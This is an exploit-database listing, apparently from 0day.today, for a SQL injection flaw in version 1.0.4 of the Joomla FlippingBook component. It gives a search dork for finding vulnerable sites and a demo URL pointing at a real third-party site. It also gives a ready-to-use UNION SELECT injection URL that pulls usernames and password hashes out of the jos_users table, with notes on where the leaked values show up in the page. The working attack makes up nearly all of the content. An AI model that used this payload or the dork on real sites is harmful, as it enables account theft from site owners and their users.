[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability

Author
cO2
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2909
Category
web applications
Date add
21-04-2008
Platform
unsorted
===============================================================
Joomla Component FlippingBook 1.0.4 SQL Injection Vulnerability
===============================================================



     [  A L G E R I A     S E C U R I T Y    C R E W  ]
##########################################
#
# [ Joomla Component FlippingBook 1.0.4 SQL Injection ]
#
##########################################
[~] Vulnerability found by: cO2 [ Algeria Security Crew ]
[~] Greetings: to all hackers DZ . . .
##########################################
[~] ScriptName : 'Joomla'
[~] ModuleName : 'FlippingBook'
[~]  Version() :  1.0.4
###########################################
#
# DORK 1 :  inurl:com_flippingbook
#
###########################################
[+]Demo : http://www.page-flip-tools.com/index.php?option=com_flippingbook

[+]Exploit :
 
/index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
###########################################
[+] : you can see the password in 'Title'
[+] : Open the source page to see the 'password'
###########################################



#  0day.today [2024-12-24]  #